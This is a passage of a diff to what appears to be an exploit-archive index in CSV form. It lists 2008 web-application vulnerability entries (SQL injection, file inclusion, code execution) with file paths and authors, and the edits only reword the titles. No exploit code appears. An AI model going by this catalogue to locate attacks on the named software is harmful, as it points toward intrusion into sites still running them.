Inclusion",2008-03-30,Cr@zy_King,php,webapps,0 -5325,platforms/php/webapps/5325.txt,"JShop 1.x < 2.x - 'xPage' Parameter Local File Inclusion",2008-03-30,v0l4arrra,php,webapps,0 -5326,platforms/php/webapps/5326.txt,"WordPress Plugin Download - 'dl_id' Parameter SQL Injection",2008-03-31,BL4CK,php,webapps,0 +5325,platforms/php/webapps/5325.txt,"JShop 1.x < 2.x - 'xPage' Local File Inclusion",2008-03-30,v0l4arrra,php,webapps,0 +5326,platforms/php/webapps/5326.txt,"WordPress Plugin Download - 'dl_id' SQL Injection",2008-03-31,BL4CK,php,webapps,0 5328,platforms/php/webapps/5328.txt,"PHPSpamManager 0.53b - 'body.php' Remote File Disclosure",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen 2.0.2 - SQL Injection",2008-03-31,anonymous,php,webapps,0 -5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - 'articleId' Parameter SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 +5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - 'articleId' SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion",2008-04-01,"Khashayar Fereidani",php,webapps,0 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - 'show.php' SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 -5335,platforms/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0 +5335,platforms/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' SQL Injection",2008-04-01,S@BUN,php,webapps,0 5336,platforms/php/webapps/5336.pl,"EggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps,0 -5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' Parameter SQL Injection",2008-04-01,Stack,php,webapps,0 +5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' SQL Injection",2008-04-01,Stack,php,webapps,0 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 -5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion",2008-04-02,w0cker,php,webapps,0 -5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion",2008-04-02,w0cker,php,webapps,0 -5350,platforms/php/webapps/5350.txt,"KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0 -5351,platforms/php/webapps/5351.txt,"KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0 -5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection",2008-04-03,Houssamix,php,webapps,0 -5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection",2008-04-03,Stack,php,webapps,0 -5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - 'reed' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Local File Inclusion",2008-04-02,w0cker,php,webapps,0 +5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - 'PATH_TO_CODE' Remote File Inclusion",2008-04-02,w0cker,php,webapps,0 +5350,platforms/php/webapps/5350.txt,"KwsPHP 1.3.456 Module Galerie - 'id_gal' SQL Injection",2008-04-03,S@BUN,php,webapps,0 +5351,platforms/php/webapps/5351.txt,"KwsPHP 1.3.456 Module Archives - 'id' SQL Injection",2008-04-03,S@BUN,php,webapps,0 +5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash 1.0 - 'cat' SQL Injection",2008-04-03,Houssamix,php,webapps,0 +5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' SQL Injection",2008-04-03,Stack,php,webapps,0 +5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - 'reed' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5360,platforms/php/webapps/5360.txt,"Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 5362,platforms/php/webapps/5362.txt,"Comdev News Publisher 4.1.2 - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion",2008-04-04,JIKO,php,webapps,0 +5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - 'photo_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - 'incl_page' Remote File Inclusion",2008-04-04,JIKO,php,webapps,0 5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - 'id_art' Parameter SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 -5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - 'lng' Parameter Local File Inclusion",2008-04-04,w0cker,php,webapps,0 +5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - 'id_art' SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 +5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - 'lng' Local File Inclusion",2008-04-04,w0cker,php,webapps,0 5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",php,webapps,0 5371,platforms/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5373,platforms/asp/webapps/5373.txt,"Cobalt 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0 -5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps,0 5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0 5380,platforms/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0 5381,platforms/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Arbitrary File Upload",2008-04-06,JIKO,php,webapps,0 -5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'categorie' Parameter SQL Injection",2008-04-06,parad0x,php,webapps,0 -5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' Parameter SQL Injection",2008-04-06,S@BUN,php,webapps,0 +5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'categorie' SQL Injection",2008-04-06,parad0x,php,webapps,0 +5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,php,webapps,0 5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps,0 -5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum' Parameter SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 +5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps,0 5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps,0 5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - 'id' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 -5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - 'project' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - 'project' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0 5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps,0 -5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Parameter Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 +5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - 'viewsource.php' Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - 'viewsource.php' File Disclosure",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - 'index.php' SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 -5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - 'ladderid' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - 'ladderid' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts Socialware - 'id' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5404,platforms/php/webapps/5404.php,"phpTournois G4 - Arbitrary File Upload / Code Execution",2008-04-08,"Charles Fol",php,webapps,0 5405,platforms/php/webapps/5405.txt,"ExBB 0.22 - Local/Remote File Inclusion",2008-04-08,The:Paradox,php,webapps,0 @@ -19400,52 +19401,52 @@ id,file,description,date,author,platform,type,port 5407,platforms/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution",2008-04-08,EgiX,php,webapps,0 5408,platforms/php/webapps/5408.pl,"LokiCMS 0.3.3 - Remote Command Execution",2008-04-08,girex,php,webapps,0 5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - SQL Injection",2008-04-08,U238,asp,webapps,0 -5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - 'matchid' Parameter SQL Injection",2008-04-08,0in,php,webapps,0 -5411,platforms/php/webapps/5411.txt,"Dream4 Koobi Pro 6.25 Links - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5412,platforms/php/webapps/5412.txt,"Dream4 Koobi Pro 6.25 Shop - 'categ' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5413,platforms/php/webapps/5413.txt,"Dream4 Koobi Pro 6.25 Gallery - 'galid' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 -5414,platforms/php/webapps/5414.txt,"Dream4 Koobi Pro 6.25 Showimages - 'galid' Parameter SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - 'matchid' SQL Injection",2008-04-08,0in,php,webapps,0 +5411,platforms/php/webapps/5411.txt,"Dream4 Koobi Pro 6.25 Links - 'categ' SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5412,platforms/php/webapps/5412.txt,"Dream4 Koobi Pro 6.25 Shop - 'categ' SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5413,platforms/php/webapps/5413.txt,"Dream4 Koobi Pro 6.25 Gallery - 'galid' SQL Injection",2008-04-08,S@BUN,php,webapps,0 +5414,platforms/php/webapps/5414.txt,"Dream4 Koobi Pro 6.25 Showimages - 'galid' SQL Injection",2008-04-08,S@BUN,php,webapps,0 5415,platforms/php/webapps/5415.txt,"Dream4 Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin",2008-04-09,t0pP8uZz,php,webapps,0 -5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - 'path' Parameter File Disclosure",2008-04-09,JIKO,php,webapps,0 +5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - 'path' File Disclosure",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version - 'file' Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0 -5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - 'id' Parameter Blind SQL Injection",2008-04-10,irvian,php,webapps,0 +5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - 'id' Blind SQL Injection",2008-04-10,irvian,php,webapps,0 5423,platforms/php/webapps/5423.txt,"Ksemail - Local File Inclusion",2008-04-10,dun,php,webapps,0 5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 -5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' Parameter SQL Injection",2008-04-10,S@BUN,php,webapps,0 -5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' Parameter SQL Injection",2008-04-11,parad0x,php,webapps,0 +5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0 +5428,platforms/php/webapps/5428.txt,"PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5431,platforms/php/webapps/5431.txt,"Joomla! Component JoomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"PHPAddressBook 2.11 - 'view.php' SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 5433,platforms/php/webapps/5433.txt,"CcMail 1.0.1 - Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 5434,platforms/php/webapps/5434.pl,"1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection",2008-04-13,girex,php,webapps,0 5435,platforms/php/webapps/5435.txt,"Joomla! Component com_extplorer 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 -5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - 'pollID' Parameter SQL Injection",2008-04-13,S@BUN,php,webapps,0 +5436,platforms/php/webapps/5436.txt,"Pollbooth 2.0 - 'pollID' SQL Injection",2008-04-13,S@BUN,php,webapps,0 5437,platforms/php/webapps/5437.txt,"CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion",2008-04-13,BugReport.IR,php,webapps,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Blind SQL Injection",2008-04-13,Lidloses_Auge,php,webapps,0 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS - SQL Injection",2008-04-14,cO2,php,webapps,0 -5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - 'content_id' Parameter SQL Injection",2008-04-14,Stack,php,webapps,0 +5443,platforms/php/webapps/5443.txt,"SmallBiz eShop - 'content_id' SQL Injection",2008-04-14,Stack,php,webapps,0 5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - 'index.php' SQL Injection",2008-04-14,"SoSo H H",php,webapps,0 -5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - 'article' Parameter SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 +5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - 'article' SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 5447,platforms/php/webapps/5447.txt,"Dream4 Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0 -5448,platforms/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' Parameter SQL Injection",2008-04-14,S@BUN,php,webapps,0 +5448,platforms/php/webapps/5448.txt,"Dream4 Koobi Pro 6.25 Poll - 'poll_id' SQL Injection",2008-04-14,S@BUN,php,webapps,0 5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0 -5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'cat_id' Parameter SQL Injection",2008-04-15,JosS,php,webapps,0 +5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0 5452,platforms/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 5454,platforms/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection",2008-04-15,cO2,php,webapps,0 5456,platforms/asp/webapps/5456.txt,"Carbon Communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 -5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' Parameter SQL Injection",2008-04-16,cO2,php,webapps,0 +5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,php,webapps,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 -5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a - 'location' Parameter Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 -5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - 'category_id' Parameter SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 +5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a - 'location' Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 +5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - 'category_id' SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 5465,platforms/php/webapps/5465.txt,"2532/Gigs 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps,0 5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0 5467,platforms/php/webapps/5467.txt,"PhShoutBox 1.5 - Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0 5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 - 'contact.php' SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0 -5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - 'AMG_id' Parameter SQL Injection",2008-04-19,Player,php,webapps,0 +5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - 'AMG_id' SQL Injection",2008-04-19,Player,php,webapps,0 5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,php,webapps,0 5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0 @@ -19454,27 +19455,27 @@ id,file,description,date,author,platform,type,port 5476,platforms/php/webapps/5476.txt,"HostDirectory Pro - Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps,0 5477,platforms/php/webapps/5477.txt,"KubeLance 1.6.4 - 'ipn.php' Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0 5478,platforms/php/webapps/5478.txt,"Acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0 -5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - 'id' Parameter SQL Injection",2008-04-21,U238,php,webapps,0 -5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - 'id' Parameter SQL Injection",2008-04-21,ZoRLu,php,webapps,0 -5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - 'LngId' Parameter SQL Injection",2008-04-21,"IRM Plc.",asp,webapps,0 -5483,platforms/php/webapps/5483.txt,"TR News 2.1 - 'nb' Parameter SQL Injection",2008-04-21,His0k4,php,webapps,0 +5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - 'id' SQL Injection",2008-04-21,U238,php,webapps,0 +5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - 'id' SQL Injection",2008-04-21,ZoRLu,php,webapps,0 +5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - 'LngId' SQL Injection",2008-04-21,"IRM Plc.",asp,webapps,0 +5483,platforms/php/webapps/5483.txt,"TR News 2.1 - 'nb' SQL Injection",2008-04-21,His0k4,php,webapps,0 5484,platforms/php/webapps/5484.txt,"Joomla! Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,php,webapps,0 5485,platforms/php/webapps/5485.pl,"Web Calendar 4.1 - Blind SQL Injection",2008-04-22,t0pP8uZz,php,webapps,0 5486,platforms/php/webapps/5486.txt,"WordPress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0 5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - 'index.php' SQL Injection",2008-04-23,JIKO,php,webapps,0 -5488,platforms/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - 'idFiliale' Parameter SQL Injection",2008-04-23,str0xo,php,webapps,0 +5488,platforms/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - 'idFiliale' SQL Injection",2008-04-23,str0xo,php,webapps,0 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,php,webapps,0 5491,platforms/php/webapps/5491.txt,"Joomla! Component Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0 5493,platforms/php/webapps/5493.txt,"Joomla! Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,php,webapps,0 5494,platforms/php/webapps/5494.txt,"MiniBB 2.2 - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2008-04-25,girex,php,webapps,0 -5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule 1.0 - 'eid' Parameter SQL Injection",2008-04-25,Kacper,php,webapps,0 +5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection",2008-04-25,Kacper,php,webapps,0 5497,platforms/php/webapps/5497.txt,"Joomla! Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps,0 5499,platforms/php/webapps/5499.txt,"Siteman 2.x - Code Execution / Local File Inclusion / Cross-Site Scripting",2008-04-26,"Khashayar Fereidani",php,webapps,0 5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection",2008-04-26,Kacper,php,webapps,0 5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-04-26,U238,php,webapps,0 5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple SQL Injections",2008-04-26,U238,asp,webapps,0 -5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' Parameter SQL Injection",2008-04-26,JIKO,php,webapps,0 +5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' SQL Injection",2008-04-26,JIKO,php,webapps,0 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0 5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps,0 5507,platforms/asp/webapps/5507.txt,"Megabbs Forum 2.2 - SQL Injection / Cross-Site Scripting",2008-04-27,BugReport.IR,asp,webapps,0 @@ -19483,17 +19484,17 @@ id,file,description,date,author,platform,type,port 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0 5512,platforms/php/webapps/5512.pl,"Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 -5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0 -5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'cat_id' Parameter SQL Injection",2008-04-28,K-159,php,webapps,0 -5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script - 'host_id' Parameter SQL Injection",2008-04-28,K-159,php,webapps,0 +5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0 +5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0 +5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script - 'host_id' SQL Injection",2008-04-28,K-159,php,webapps,0 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - 'browse.videos.php' SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure",2008-04-29,"Roberto Suggi Liverani",php,webapps,0 5522,platforms/php/webapps/5522.txt,"LokiCMS 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps,0 5523,platforms/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,php,webapps,0 5524,platforms/php/webapps/5524.txt,"OxYProject 0.85 - 'edithistory.php' Remote Code Execution",2008-04-30,GoLd_M,php,webapps,0 -5525,platforms/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusion",2008-04-30,k1n9k0ng,php,webapps,0 -5526,platforms/php/webapps/5526.txt,"Interact 2.4.1 - Multiple Remote File Inclusion",2008-04-30,RoMaNcYxHaCkEr,php,webapps,0 -5527,platforms/php/webapps/5527.pl,"Joomla! Component Webhosting - 'catid' Parameter Blind SQL Injection",2008-05-01,cO2,php,webapps,0 +5525,platforms/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusions",2008-04-30,k1n9k0ng,php,webapps,0 +5526,platforms/php/webapps/5526.txt,"Interact 2.4.1 - Multiple Remote File 